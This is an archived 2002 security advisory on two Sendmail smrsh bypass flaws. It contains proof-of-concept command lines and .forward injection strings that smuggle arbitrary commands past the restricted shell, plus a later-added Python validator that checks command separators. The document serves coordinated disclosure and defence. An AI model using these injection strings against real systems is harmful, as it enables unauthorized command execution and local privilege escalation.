[UNIX] Sendmail smrsh Bypass Vulnerabilities
From: support@securiteam.com
Date: 10/01/02
From: support@securiteam.com To: list@securiteam.com Date: Tue, 1 Oct 2002 21:39:27 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
Sendmail smrsh Bypass Vulnerabilities
------------------------------------------------------------------------
SUMMARY
It is possible for an attacker to bypass the restrictions imposed by the
Sendmail Consortium's Restricted Shell (SMRSH) and execute a binary of his
choosing by inserting a special character sequence into his .forward file.
SMRSH is an application intended as a restricted replacement for sh when
Sendmail runs program deliveries. There are two attack methods, both of
which are detailed below.
DETAILS
Vulnerable systems:
* Sendmail version 8.12.6
* Sendmail version 8.11.6-15
Method one:
This method takes advantage of the application's handling of the '||'
operator. The process is best explained with an example:
$ echo "echo unauthorized execute" > /tmp/unauth
$ smrsh -c ". || . /tmp/unauth || ."
/bin/sh: /etc/smrsh/.: is a directory
unauthorized execute
/tmp/unauth is executed despite the fact that it is not located in the
SMRSH restricted directory /etc/smrsh. This happens because SMRSH only
checks the first command, '.', which exists in /etc/smrsh, and performs no
further verification on the commands listed after '||'. The same attack
would look like the following in the attacker's .forward file:
"| . \|| . /tmp/unauth \|| ."
Method two:
This method takes advantage of the following routine from smrsh.c:
    /* search backwards for last / (allow for 0200 bit) */
    while (cmd > q)
    {
        if ((*--cmd & 0177) == '/')
        {
            cmd++;
            break;
        }
    }
It is possible to feed SMRSH a command line whose program name is
internally converted to a space, thereby bypassing all filters, yet which
will still execute. Examples of these include:
smrsh -c "/ command"
smrsh -c "../ command"
smrsh -c "./ command"
smrsh -c "././ command"
The listed routine strips everything up to and including the last '/' of
the program name, so any of the above examples is reduced to a space.
However, when the following execle() call is reached:
(void) execle("/bin/sh", "/bin/sh", "-c", newcmdbuf, NULL, newenv);
SMRSH will execute:
/bin/sh -c  command
Notice that, despite the double space, 'command' will still execute. The
.forward variation of this attack works the same way.
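Both methods above come down to the same defect: SMRSH validates only the first program name on the line, and the basename-stripping loop can reduce that name to nothing. The following validator, an added example that is not code from the advisory or from Sendmail, shows the checks a hardened wrapper needs: it splits on every command separator, checks each command, and rejects program names that contain any directory component (stricter than smrsh, which strips the path). The allow-list contents are constructed for the example; the sample command lines are the ones quoted in the advisory.

```python
import os
import re
import shlex

# Constructed allow-list standing in for the contents of /etc/smrsh.
ALLOWED_PROGRAMS = {"procmail", "vacation"}

# Every way one line can carry more than one command: '||', '&&', ';', '&', '|', newline.
SEPARATORS = re.compile(r"\|\||&&|[;&|\n]")

# Characters that enable substitution or redirection; rejected outright.
FORBIDDEN_CHARS = set("`$()<>\\")


def commands_in(cmdline: str) -> list:
    """Split on every separator so each command is checked, not just the first."""
    return [part.strip() for part in SEPARATORS.split(cmdline)]


def command_is_allowed(command: str) -> bool:
    """Accept one command only if its program name is a bare, allow-listed basename."""
    if FORBIDDEN_CHARS & set(command):
        return False
    try:
        argv = shlex.split(command)
    except ValueError:
        return False                      # unbalanced quotes
    if not argv:
        return False                      # empty command, e.g. between two '||'
    prog = argv[0]
    # '/ command', '../ command' and friends have a program name of '/' or '../';
    # basename() of those is '' so they fail this comparison instead of being
    # stripped to a space as in the vulnerable loop.
    if prog != os.path.basename(prog):
        return False
    if prog in ("", ".", ".."):
        return False
    return prog in ALLOWED_PROGRAMS


def cmdline_is_allowed(cmdline: str) -> bool:
    """True only if every command on the line passes command_is_allowed()."""
    return all(command_is_allowed(c) for c in commands_in(cmdline))
```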
Analysis:
The following are required conditions for successful and meaningful
exploitation of this vulnerability:
* The target system must be utilizing SMRSH.
* The attacker must have a valid local account on the system.
* In method one the attacker must be able to create files.
While this exploit obviously removes the restrictions imposed by SMRSH, it
also allows users to execute programs on systems to which they do not have
shell access. Utilizing either of the above-described methods, an attacker
who can modify his own .forward file can execute arbitrary commands on the
target system with the privileges of his own account. Because systems that
forbid shell access generally do not have tightened local security, the
ability to execute arbitrary commands through the SMRSH vulnerability opens
the target system to local privilege escalation attacks that otherwise
would not be possible.
Detection:
The latest versions of SMRSH are vulnerable, including the versions
packaged with Sendmail 8.12.6 and Sendmail 8.11.6-15 (the default install
of RedHat 7.3). Older versions of SMRSH do not appear to be vulnerable
(8.11, 5/19/1998). The version of SMRSH available at
ftp://ftp.uu.net/pub/security/smrsh is also not vulnerable.
Workaround:
Sendmail.org has provided a patch addressing the above-described issues.
The patch is available for download at:
http://www.sendmail.org/patches/smrsh-20020924.patch
Vendor fix/Response:
Sendmail.org's official comment:
"We would like to thank iDEFENSE, zen-parse, and Pedram Amini for bringing
these problems to our attention.
If you actually use a vulnerable smrsh version (which can be tested
according to the descriptions given before), please apply the patch that
has been made available. To figure out whether your configuration uses
smrsh, check your sendmail.mc file, i.e., look for
FEATURE(`smrsh')
And check your sendmail.cf file (usually located in /etc/mail or /etc):
grep '^Mprog.*smrsh' sendmail.cf
Also consider whether you actually need this feature, e.g., if you make
procmail available to your users then smrsh is basically useless."
Disclosure timeline:
9/1/2002 Disclosed to iDEFENSE
9/24/2002 Disclosed to sendmail-bugs@sendmail.org
9/24/2002 Disclosed to iDEFENSE clients
9/24/2002 Response from Greg Shapiro gshapiro@sendmail.org
9/25/2002 Coordination from Claus Assmann ca@sendmail.org
10/1/2002 Public Coordinated Disclosure
ADDITIONAL INFORMATION
Method One was exclusively disclosed to iDEFENSE by zen-parse
(zen-parse@gmx.net).
Method Two was discovered during the verification process by Pedram Amini
(pamini@idefense.com).